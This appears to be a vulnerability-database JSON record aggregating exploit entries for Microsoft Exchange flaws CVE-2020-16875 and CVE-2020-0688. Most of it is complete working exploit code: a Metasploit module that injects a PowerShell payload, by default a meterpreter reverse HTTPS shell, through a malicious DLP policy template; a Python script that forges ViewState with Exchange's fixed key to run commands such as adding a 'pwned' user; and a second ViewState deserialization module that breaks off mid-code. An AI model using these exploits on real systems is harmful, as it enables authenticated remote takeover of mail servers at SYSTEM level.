"AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688"], "modified": "2020-05-01T00:00:00", "id": "CPAI-2020-0104", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2021-12-27T05:18:35", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Exchange Server. Authentication is required to exploit this vulnerability. Additionally, the target user must have the \"Data Loss Prevention\" role assigned and an active mailbox. If the user is in the \"Compliance Management\" or greater \"Organization Management\" role groups, then they have the \"Data Loss Prevention\" role. Since the user who installed Exchange is in the \"Organization Management\" role group, they transitively have the \"Data Loss Prevention\" role. The specific flaw exists within the processing of the New-DlpPolicy cmdlet. The issue results from the lack of proper validation of user-supplied template data when creating a DLP policy. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Tested against Exchange Server 2016 CU14 on Windows Server 2016.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-09-17T00:00:00", "type": "zdt", "title": "Microsoft Exchange Server DlpUtils AddTenantDlpPolicy Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16875"], "modified": "2020-09-17T00:00:00", "id": "1337DAY-ID-34947", "href": "https://0day.today/exploit/description/34947", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Powershell\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Exchange Server DlpUtils AddTenantDlpPolicy RCE',\n 'Description' => %q{\n This vulnerability allows remote attackers to execute arbitrary code\n on affected installations of Exchange Server. Authentication is\n required to exploit this vulnerability. Additionally, the target user\n must have the \"Data Loss Prevention\" role assigned and an active\n mailbox.\n\n If the user is in the \"Compliance Management\" or greater \"Organization\n Management\" role groups, then they have the \"Data Loss Prevention\"\n role. Since the user who installed Exchange is in the \"Organization\n Management\" role group, they transitively have the \"Data Loss\n Prevention\" role.\n\n The specific flaw exists within the processing of the New-DlpPolicy\n cmdlet. The issue results from the lack of proper validation of\n user-supplied template data when creating a DLP policy. An attacker\n can leverage this vulnerability to execute code in the context of\n SYSTEM.\n\n Tested against Exchange Server 2016 CU14 on Windows Server 2016.\n },\n 'Author' => [\n 'mr_me', # Discovery, exploits, and most of the words above\n 'wvu' # Module\n ],\n 'References' => [\n ['CVE', '2020-16875'],\n ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16875'],\n ['URL', 'https://support.microsoft.com/en-us/help/4577352/security-update-for-exchange-server-2019-and-2016'],\n ['URL', 'https://srcincite.io/advisories/src-2020-0019/'],\n ['URL', 'https://srcincite.io/pocs/cve-2020-16875.py.txt'],\n ['URL', 'https://srcincite.io/pocs/cve-2020-16875.ps1.txt']\n ],\n 'DisclosureDate' => '2020-09-08', # Public disclosure\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n ['Exchange Server 2016 and 2019 w/o KB4577352', {}]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'SSL' => true,\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_https',\n 'HttpClientTimeout' => 5,\n 'WfsDelay' => 10\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [\n IOC_IN_LOGS,\n ACCOUNT_LOCKOUTS, # Creates a concurrent OWA session\n CONFIG_CHANGES, # Creates a new DLP policy\n ARTIFACTS_ON_DISK # Uses a DLP policy template file\n ]\n }\n )\n )\n\n register_options([\n Opt::RPORT(443),\n OptString.new('TARGETURI', [true, 'Base path', '/']),\n OptString.new('USERNAME', [false, 'OWA username']),\n OptString.new('PASSWORD', [false, 'OWA password'])\n ])\n end\n\n def post_auth?\n true\n end\n\n def username\n datastore['USERNAME']\n end\n\n def password\n datastore['PASSWORD']\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/owa/auth/logon.aspx')\n )\n\n unless res\n return CheckCode::Unknown('Target did not respond to check.')\n end\n\n unless res.code == 200 && res.body.include?('<title>Outlook</title>')\n return CheckCode::Unknown('Target does not appear to be running OWA.')\n end\n\n CheckCode::Detected(\"OWA is running at #{full_uri('/owa/')}\")\n end\n\n def exploit\n owa_login\n create_dlp_policy(retrieve_viewstate)\n end\n\n def owa_login\n unless username && password\n fail_with(Failure::BadConfig, 'USERNAME and PASSWORD are required for exploitation')\n end\n\n print_status(\"Logging in to OWA with creds #{username}:#{password}\")\n\n res = send_request_cgi!({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/owa/auth.owa'),\n 'vars_post' => {\n 'username' => username,\n 'password' => password,\n 'flags' => '',\n 'destination' => full_uri('/owa/', vhost_uri: true)\n },\n 'keep_cookies' => true\n }, datastore['HttpClientTimeout'], 2) # timeout and redirect_depth\n\n unless res\n fail_with(Failure::Unreachable, 'Failed to access OWA login page')\n end\n\n unless res.code == 200 && cookie_jar.grep(/^cadata/).any?\n if res.body.include?('There are too many active sessions connected to this mailbox.')\n fail_with(Failure::NoAccess, 'Reached active session limit for mailbox')\n end\n\n fail_with(Failure::NoAccess, 'Failed to log in to OWA with supplied creds')\n end\n\n if res.body.include?('Choose your preferred display language and home time zone below.')\n fail_with(Failure::NoAccess, 'Mailbox is active but not fully configured')\n end\n\n print_good('Successfully logged in to OWA')\n end\n\n def retrieve_viewstate\n print_status('Retrieving ViewState from DLP policy creation page')\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/ecp/DLPPolicy/ManagePolicyFromISV.aspx'),\n 'agent' => '', # HACK: Bypass Exchange's User-Agent validation\n 'keep_cookies' => true\n )\n\n unless res\n fail_with(Failure::Unreachable, 'Failed to access DLP policy creation page')\n end\n\n unless res.code == 200 && (viewstate = res.get_html_document.at('//input[@id = \"__VIEWSTATE\"]/@value')&.text)\n fail_with(Failure::UnexpectedReply, 'Failed to retrieve ViewState')\n end\n\n print_good('Successfully retrieved ViewState')\n viewstate\n end\n\n def create_dlp_policy(viewstate)\n print_status('Creating custom DLP policy from malicious template')\n vprint_status(\"DLP policy name: #{dlp_policy_name}\")\n\n form_data = Rex::MIME::Message.new\n form_data.add_part(viewstate, nil, nil, 'form-data; name=\"__VIEWSTATE\"')\n form_data.add_part(\n 'ResultPanePlaceHolder_ButtonsPanel_btnNext',\n nil,\n nil,\n 'form-data; name=\"ctl00$ResultPanePlaceHolder$senderBtn\"'\n )\n form_data.add_part(\n dlp_policy_name,\n nil,\n nil,\n 'form-data; name=\"ctl00$ResultPanePlaceHolder$contentContainer$name\"'\n )\n form_data.add_part(\n dlp_policy_template,\n 'text/xml',\n nil,\n %(form-data; name=\"ctl00$ResultPanePlaceHolder$contentContainer$upldCtrl\"; filename=\"#{dlp_policy_filename}\")\n )\n\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/ecp/DLPPolicy/ManagePolicyFromISV.aspx'),\n 'agent' => '', # HACK: Bypass Exchange's User-Agent validation\n 'ctype' => \"multipart/form-data; boundary=#{form_data.bound}\",\n 'data' => form_data.to_s\n }, 0)\n end\n\n def dlp_policy_template\n # https://docs.microsoft.com/en-us/exchange/developing-dlp-policy-template-files-exchange-2013-help\n <<~XML\n <?xml version=\"1.0\" encoding=\"UTF-8\"?>\n <dlpPolicyTemplates>\n <dlpPolicyTemplate id=\"F7C29AEC-A52D-4502-9670-141424A83FAB\" mode=\"Audit\" state=\"Enabled\" version=\"15.0.2.0\">\n <contentVersion>4</contentVersion>\n <publisherName>Metasploit</publisherName>\n <name>\n <localizedString lang=\"en\">#{dlp_policy_name}</localizedString>\n </name>\n <description>\n <localizedString lang=\"en\">wvu was here</localizedString>\n </description>\n <keywords></keywords>\n <ruleParameters></ruleParameters>\n <policyCommands>\n <commandBlock>\n <![CDATA[#{cmd_psh_payload(payload.encoded, payload.arch.first, exec_in_place: true)}]]>\n </commandBlock>\n </policyCommands>\n <policyCommandsResources></policyCommandsResources>\n </dlpPolicyTemplate>\n </dlpPolicyTemplates>\n XML\n end\n\n def dlp_policy_name\n @dlp_policy_name ||= \"#{Faker::Bank.name.titleize} Data\"\n end\n\n def dlp_policy_filename\n @dlp_policy_filename ||= \"#{rand_text_alphanumeric(8..42)}.xml\"\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/34947", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-12-19T19:21:18", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-02T00:00:00", "type": "zdt", "title": "Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688"], "modified": "2020-03-02T00:00:00", "id": "1337DAY-ID-34037", "href": "https://0day.today/exploit/description/34037", "sourceData": "# Exploit Title: Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution\n# Exploit Author: Photubias\n# Vendor Advisory: [1] https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688\n# [2] https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys\n# Vendor Homepage: https://www.microsoft.com\n# Version: MS Exchange Server 2010 SP3 up to 2019 CU4\n# Tested on: MS Exchange 2019 v15.2.221.12 running on Windows Server 2019\n# CVE: CVE-2020-0688\n\n#! /usr/bin/env python\n# -*- coding: utf-8 -*- \n''' \n\n \n\tCopyright 2020 Photubias(c)\n\n This program is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n This program is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with this program. If not, see <http://www.gnu.org/licenses/>.\n \n File name CVE-2020-0688-Photubias.py\n written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be\n\n This is a native implementation without requirements, written in Python 2.\n Works equally well on Windows as Linux (as MacOS, probably ;-)\n Reverse Engineered Serialization code from https://github.com/pwntester/ysoserial.net\n\n Example Output:\n CVE-2020-0688-Photubias.py -t https://10.11.12.13 -u sean -c \"net user pwned pwned /add\"\n [+] Login worked\n [+] Got ASP.NET Session ID: 83af2893-6e1c-4cee-88f8-b706ebc77570\n [+] Detected OWA version number 15.2.221.12\n [+] Vulnerable View State \"B97B4E27\" detected, this host is vulnerable!\n [+] All looks OK, ready to send exploit (net user pwned pwned /add)? [Y/n]:\n [+] Got Payload: /wEy0QYAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAADzBDxSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSI+DQoJIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IkxhdW5jaENhbGMiIE9iamVjdFR5cGUgPSAieyB4OlR5cGUgRGlhZzpQcm9jZXNzfSIgTWV0aG9kTmFtZSA9ICJTdGFydCIgPg0KICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+DQogICAgICAgIDxTeXN0ZW06U3RyaW5nPmNtZDwvU3lzdGVtOlN0cmluZz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc+L2MgIm5ldCB1c2VyIHB3bmVkIHB3bmVkIC9hZGQiIDwvU3lzdGVtOlN0cmluZz4NCiAgICAgPC9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICA8L09iamVjdERhdGFQcm92aWRlcj4NCjwvUmVzb3VyY2VEaWN0aW9uYXJ5PgvjXlpQBwdP741icUH6Wivr7TlI6g==\n Sending now ...\n'''\nimport urllib2, urllib, base64, binascii, hashlib, hmac, struct, argparse, sys, cookielib, ssl, getpass\n\n## STATIC STRINGS\n# This string acts as a template for the serialization (contains \"###payload###\" to be replaced and TWO size locations)\nstrSerTemplate = base64.b64decode('/wEy2gYAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAAD8BDxSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSI+DQoJIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IkxhdW5jaENhbGMiIE9iamVjdFR5cGUgPSAieyB4OlR5cGUgRGlhZzpQcm9jZXNzfSIgTWV0aG9kTmFtZSA9ICJTdGFydCIgPg0KICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+DQogICAgICAgIDxTeXN0ZW06U3RyaW5nPmNtZDwvU3lzdGVtOlN0cmluZz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc+L2MgIiMjI3BheWxvYWQjIyMiIDwvU3lzdGVtOlN0cmluZz4NCiAgICAgPC9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICA8L09iamVjdERhdGFQcm92aWRlcj4NCjwvUmVzb3VyY2VEaWN0aW9uYXJ5Pgs=')\n# This is a key installed in the Exchange Server, it is changeable, but often not (part of the vulnerability)\nstrSerKey = binascii.unhexlify('CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF')\n\ndef convertInt(iInput, length): \n return struct.pack(\"<I\" , int(iInput)).encode('hex')[:length]\n\ndef getYsoserialPayload(sCommand, sSessionId):\n ## PART1 of the payload to hash\n strPart1 = strSerTemplate.replace('###payload###', sCommand)\n ## Fix the length fields\n #print(binascii.hexlify(strPart1[3]+strPart1[4])) ## 'da06' > '06da' (0x06b8 + len(sCommand))\n #print(binascii.hexlify(strPart1[224]+strPart1[225])) ## 'fc04' > '04fc' (0x04da + len(sCommand))\n strLength1 = convertInt(0x06b8 + len(sCommand),4)\n strLength2 = convertInt(0x04da + len(sCommand),4)\n strPart1 = strPart1[:3] + binascii.unhexlify(strLength1) + strPart1[5:]\n strPart1 = strPart1[:224] + binascii.unhexlify(strLength2) + strPart1[226:]\n \n ## PART2 of the payload to hash\n strPart2 = '274e7bb9'\n for v in sSessionId: strPart2 += binascii.hexlify(v)+'00'\n strPart2 = binascii.unhexlify(strPart2)\n \n strMac = hmac.new(strSerKey, strPart1 + strPart2, hashlib.sha1).hexdigest()\n strResult = base64.b64encode(strPart1 + binascii.unhexlify(strMac))\n return strResult\n\ndef verifyLogin(sTarget, sUsername, sPassword, oOpener, oCookjar):\n if not sTarget[-1:] == '/': sTarget += '/'\n ## Verify Login\n lPostData = {'destination' : sTarget, 'flags' : '4', 'forcedownlevel' : '0', 'username' : sUsername, 'password' : sPassword, 'passwordText' : '', 'isUtf8' : '1'}\n try: sResult = oOpener.open(urllib2.Request(sTarget + 'owa/auth.owa', data=urllib.urlencode(lPostData), headers={'User-Agent':'Python'})).read()\n except: print('[!] Error, ' + sTarget + ' not reachable')\n bLoggedIn = False\n for cookie in oCookjar:\n if cookie.name == 'cadata': bLoggedIn = True\n if not bLoggedIn:\n print('[-] Login Wrong, too bad')\n exit(1)\n print('[+] Login worked')\n\n ## Verify Session ID\n sSessionId = ''\n sResult = oOpener.open(urllib2.Request(sTarget+'ecp/default.aspx', headers={'User-Agent':'Python'})).read()\n for cookie in oCookjar:\n if 'SessionId' in cookie.name: sSessionId = cookie.value\n print('[+] Got ASP.NET Session ID: ' + sSessionId)\n\n ## Verify OWA Version\n sVersion = ''\n try: sVersion = sResult.split('stylesheet')[0].split('href=\"')[1].split('/')[2]\n except: sVersion = 'favicon'\n if 'favicon' in sVersion:\n print('[*] Problem, this user has never logged in before (wizard detected)')\n print(' Please log in manually first at ' + sTarget + 'ecp/default.aspx')\n exit(1)\n print('[+] Detected OWA version number '+sVersion)\n\n ## Verify ViewStateValue\n sViewState = ''\n try: sViewState = sResult.split('__VIEWSTATEGENERATOR')[2].split('value=\"')[1].split('\"')[0]\n except: pass\n if sViewState == 'B97B4E27':\n print('[+] Vulnerable View State \"B97B4E27\" detected, this host is vulnerable!')\n else:\n print('[-] Error, viewstate wrong or not correctly parsed: '+sViewState)\n ans = raw_input('[?] Still want to try the exploit? [y/N]: ')\n if ans == '' or ans.lower() == 'n': exit(1)\n return sSessionId, sTarget, sViewState\n \ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-t', '--target', help='Target IP or hostname (e.g. https://owa.contoso.com)', default='')\n parser.add_argument('-u', '--username', help='Username (e.g. joe or [email\u00a0protected])', default='')\n parser.add_argument('-p', '--password', help='Password (leave empty to ask for it)', default='')\n parser.add_argument('-c', '--command', help='Command to put behind \"cmd /c \" (e.g. net user pwned pwned /add)', default='')\n args = parser.parse_args()\n if args.target == '' or args.username == '' or args.command == '':\n print('[!] Example usage: ')\n print(' ' + sys.argv[0] + ' -t https://owa.contoso.com -u joe -c \"net user pwned pwned /add\"')\n else:\n if args.password == '': sPassword = getpass.getpass('[*] Please enter the password: ')\n else: sPassword = args.password\n ctx = ssl.create_default_context()\n ctx.check_hostname = False\n ctx.verify_mode = ssl.CERT_NONE\n oCookjar = cookielib.CookieJar()\n #oProxy = urllib2.ProxyHandler({'http': '127.0.0.1:8080', 'https': '127.0.0.1:8080'})\n #oOpener = urllib2.build_opener(urllib2.HTTPSHandler(context=ctx),urllib2.HTTPCookieProcessor(oCookjar),oProxy)\n oOpener = urllib2.build_opener(urllib2.HTTPSHandler(context=ctx),urllib2.HTTPCookieProcessor(oCookjar))\n sSessionId, sTarget, sViewState = verifyLogin(args.target, args.username, sPassword, oOpener, oCookjar)\n ans = raw_input('[+] All looks OK, ready to send exploit (' + args.command + ')? [Y/n]: ')\n if ans.lower() == 'n': exit(0)\n sPayLoad = getYsoserialPayload(args.command, sSessionId)\n print('[+] Got Payload: ' + sPayLoad)\n sURL = sTarget + 'ecp/default.aspx?__VIEWSTATEGENERATOR=' + sViewState + '&__VIEWSTATE=' + urllib.quote_plus(sPayLoad)\n print(' Sending now ...')\n try: oOpener.open(urllib2.Request(sURL, headers={'User-Agent':'Python'}))\n except urllib2.HTTPError, e:\n if e.code == '500': print('[+] This probably worked (Error Code 500 received)')\n\nif __name__ == \"__main__\":\n\tmain()\n", "sourceHref": "https://0day.today/exploit/34037", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-03-05T03:14:28", "description": "This Metasploit module exploits a .NET serialization vulnerability in the Exchange Control Panel (ECP) web page. The vulnerability is due to Microsoft Exchange Server not randomizing the keys on a per-installation basis resulting in them using the same validationKey and decryptionKey values. With knowledge of these, values an attacker can craft a special viewstate to cause an OS command to be executed by NT_AUTHORITY\\SYSTEM using .NET deserialization.", "cvss3": {}, "published": "2020-03-05T00:00:00", "type": "zdt", "title": "Exchange Control Panel Viewstate Deserialization Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-0688"], "modified": "2020-03-05T00:00:00", "id": "1337DAY-ID-34051", "href": "https://0day.today/exploit/description/34051", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'bindata'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n # include Msf::Auxiliary::Report\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStager\r\n\r\n DEFAULT_VIEWSTATE_GENERATOR = 'B97B4E27'\r\n VALIDATION_KEY = \"\\xcb\\x27\\x21\\xab\\xda\\xf8\\xe9\\xdc\\x51\\x6d\\x62\\x1d\\x8b\\x8b\\xf1\\x3a\\x2c\\x9e\\x86\\x89\\xa2\\x53\\x03\\xbf\"\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Exchange Control Panel Viewstate Deserialization',\r\n 'Description' => %q{\r\n This module exploits a .NET serialization vulnerability in the\r\n Exchange Control Panel (ECP) web page. The vulnerability is due to\r\n Microsoft Exchange Server not randomizing the keys on a\r\n per-installation basis resulting in them using the same validationKey\r\n and decryptionKey values. With knowledge of these, values an attacker\r\n can craft a special viewstate to cause an OS command to be executed\r\n by NT_AUTHORITY\\SYSTEM using .NET deserialization.\r\n },\r\n 'Author' => 'Spencer McIntyre',\r\n 'License' => MSF_LICENSE,\r\n 'References' => [\r\n ['CVE', '2020-0688'],\r\n ['URL', 'https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys'],\r\n ],\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Windows (x86)', { 'Arch' => ARCH_X86 } ],\r\n [ 'Windows (x64)', { 'Arch' => ARCH_X64 } ],\r\n [ 'Windows (cmd)', { 'Arch' => ARCH_CMD, 'Space' => 450 } ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'SSL' => true\r\n },\r\n 'DefaultTarget' => 1,\r\n 'DisclosureDate' => '2020-02-11',\r\n 'Notes' =>\r\n {\r\n 'Stability' => [ CRASH_SAFE, ],\r\n 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],\r\n 'Reliability' => [ REPEATABLE_SESSION, ],\r\n }\r\n ))\r\n\r\n register_options([\r\n Opt::RPORT(443),\r\n OptString.new('TARGETURI', [ true, 'The base path to the web application', '/' ]),\r\n OptString.new('USERNAME', [ true, 'Username to authenticate as', '' ]),\r\n OptString.new('PASSWORD', [ true, 'The password to authenticate with' ])\r\n ])\r\n\r\n register_advanced_options([\r\n OptFloat.new('CMDSTAGER::DELAY', [ true, 'Delay between command executions', 0.5 ]),\r\n ])\r\n end\r\n\r\n def check\r\n state = get_request_setup\r\n viewstate = state[:viewstate]\r\n return CheckCode::Unknown if viewstate.nil?\r\n\r\n viewstate = Rex::Text.decode_base64(viewstate)\r\n body = viewstate[0...-20]\r\n signature = viewstate[-20..-1]\r\n\r\n unless generate_viewstate_signature(state[:viewstate_generator], state[:session_id], body) == signature\r\n return CheckCode::Safe\r\n end\r\n\r\n # we've validated the signature matches based on the data we have and thus\r\n # proven that we are capable of signing a viewstate ourselves\r\n CheckCode::Vulnerable\r\n end\r\n\r\n def generate_viewstate(generator, session_id, cmd)\r\n viewstate = ::Msf::Util::DotNetDeserialization.generate(cmd)\r\n signature = generate_viewstate_signature(generator, session_id, viewstate)\r\n Rex::Text.encode_base64(viewstate + signature)\r\n end\r\n\r\n def generate_viewstate_signature(generator, session_id, viewstate)\r\n mac_key_bytes = Rex::Text.hex_to_raw(generator).unpack('I<').pack('I>')\r\n mac_key_bytes << Rex::Text.to_unicode(session_id)\r\n OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha1'), VALIDATION_KEY, viewstate + mac_key_bytes)\r\n end\r\n\r\n def exploit\r\n state = get_request_setup\r\n\r\n # the major limit is the max length of a GET request, the command will be\r\n # XML escaped and then base64 encoded which both increase the size\r\n if target.arch.first == ARCH_CMD\r\n execute_command(payload.encoded, opts={state: state})\r\n else\r\n cmd_target = targets.select { |target| target.arch.include? ARCH_CMD }.first\r\n execute_cmdstager({linemax: cmd_target.opts['Space'], delay: datastore['CMDSTAGER::DELAY'], state: state})\r\n end\r\n end\r\n\r\n def execute_command(cmd, opts)\r\n state = opts[:state]\r\n viewstate = generate_viewstate(state[:viewstate_generator], state[:session_id], cmd)\r\n 5.times do |iteration|\r\n # this request *must* be a GET request, can't use POST to use a larger viewstate\r\n send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'ecp', 'default.aspx'),\r\n 'cookie' => state[:cookies].join(''),\r\n 'agent' => state[:user_agent],\r\n 'vars_get' => {\r\n '__VIEWSTATE' => viewstate,\r\n '__VIEWSTATEGENERATOR' => state[:viewstate_generator]\r\n }\r\n })\r\n break\r\n rescue Rex::ConnectionError, Errno::ECONNRESET => e\r\n vprint_warning('Encountered a connection error while sending the command, sleeping before retrying')\r\n sleep iteration\r\n end\r\n end\r\n\r\n def get_request_setup\r\n # need to use a newer default user-agent than what Metasploit currently provides\r\n # see: https://docs.microsoft.com/en-us/microsoft-edge/web-platform/user-agent-string\r\n user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.74 Safari/537.36 Edg/79.0.309.43'\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'owa', 'auth.owa'),\r\n 'method' => 'POST',\r\n 'agent' => user_agent,\r\n 'vars_post' => {\r\n 'password' => datastore['PASSWORD'],\r\n 'flags' => '4',\r\n 'destination' => full_uri(normalize_uri(target_uri.path, 'owa')),\r\n 'username' => datastore['USERNAME']\r\n }\r\n })\r\n fail_with(Failure::Unreachable, 'The initial HTTP request to the server failed') if res.nil?\r\n cookies = [res.get_cookies]\r\n\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'ecp', 'default.aspx'),\r\n 'cookie' => res.get_cookies,\r\n 'agent' => user_agent\r\n })\r\n fail_with(Failure::UnexpectedReply, 'Failed to get the 